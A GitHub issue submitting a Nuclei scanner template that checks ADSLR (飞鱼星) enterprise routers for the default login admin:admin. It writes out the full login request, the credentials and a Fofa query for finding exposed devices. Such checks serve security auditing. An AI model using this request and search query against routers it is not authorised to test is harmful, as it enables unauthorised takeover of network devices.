### ISSUE TITLE
adslr router default password

### ISSUE THREAD

**Issue by SleepingBag945** [projectdiscovery/nuclei-templates#7959]
### Template Information:

adslr router default password
Fofa: title=="飞鱼星企业级智能上网行为管理系统"

### Nuclei Template:

```yaml
id: adslr-router-default-password

info:
  name: adslr router default password
  author: SleepingBag945
  severity: medium
  description: |
    Attackers can log in through admin:admin, check the system status, and configure the device.
  tags: defaultaccount

http:
  - raw:
      - |
        POST /send_order.cgi?parameter=login HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Origin: http://{{Hostname}}
        Referer: http://{{Hostname}}/home/login.html
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0
        X-Requested-With: XMLHttpRequest

        {"username":"admin","password":"{{password}}"}

    attack: pitchfork
    payloads:
      password:
        - admin

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200 && !contains(body_1,"error") && contains(body_1,"{\"type\":0,\"msg\":\"ok\"}")'
        condition: and

```
